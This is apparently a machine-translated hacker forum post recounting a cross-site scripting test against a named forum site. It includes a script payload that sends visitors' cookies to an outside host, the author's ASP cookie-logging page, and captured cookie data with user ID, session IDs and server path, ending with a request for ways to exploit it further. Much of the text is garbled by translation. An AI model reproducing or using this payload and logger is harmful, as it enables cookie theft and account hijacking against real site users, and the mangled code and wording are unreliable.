I. Cross-Site Testing
Let's take a look at my cross-site test.
I want to test it on a site with a professional arrearage:
HOST: zhiyeqianqian.51web.cn
My test:
First, upload two images in his forum,
Figure 1 shows the following content:
<SCRIPT> document. Location = 'HTTP: // linzi.cnbct.org/cookie.asp? MSG = '+ document. Cookie </SCRIPT>
The URL is uploadfile/2005-6/200562716565777847. jpg.
Figure 2 is my personal photo
Uploadfile/2005-6/200562716563048909. jpg
Write a cookie Code In my space, the cookie stealing code of LCX is incorrect, So I modified it.
<%
Cookiefile = server. mappath ("cookie.txt ")
Set FS = server. Createobject ("scripting. FileSystemObject ")
Set cookiefile = FS. opentextfile (cookiefile, 8, true, 0)
Cookiefile. Write (request. querystring & "<br> ")
Cookiefile. Close
Set FS = nothing
%>
<Meta HTTP-EQUIV = "refresh" content = "0; url = http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
Next, click figure 1 to automatically go to Figure 2,
Ii. Result Analysis
Go to my space and check that the cookie is caught as follows:
MSG = ewwwrootzhiyeqianqianwwwroot = userid = 218 & usercookies = 1 & statuserid = 2190418138 & Password = want? Hey hey & userhidden = 2 & userclass = % D0 % C2 % Ca % D6 % C9 % CF % C2 % B7 & username = Linzi; % 20 aspsessionidqscaaqtb = hmplnimdhocdjkpelpgbboog; % 20 dvbbs; % 20 dvbbsmagicface = 862; % 20 upnum = 2; % 20 aspsessionidqsaaartb = jbppmonddegfgheoicdhfjim <br>
The absolute path for Cookie analysis is E: \ wwwroot \ zhiyeqianqian \ wwwroot.
Iii. Discussion
Originally, in my initial test, I was talking about testing BCT, and he was able to expose his absolute path. At the beginning, I thought it was a hole in the net, so I went to test several other sites. The test result is that other sites are not exposed to the path. Today, I'm trying again to test the "owe me money" argument, but it's not violent, I checked the code, which is similar to other people's code.
I would like to hear your opinion. Can you take advantage of the problem ~~~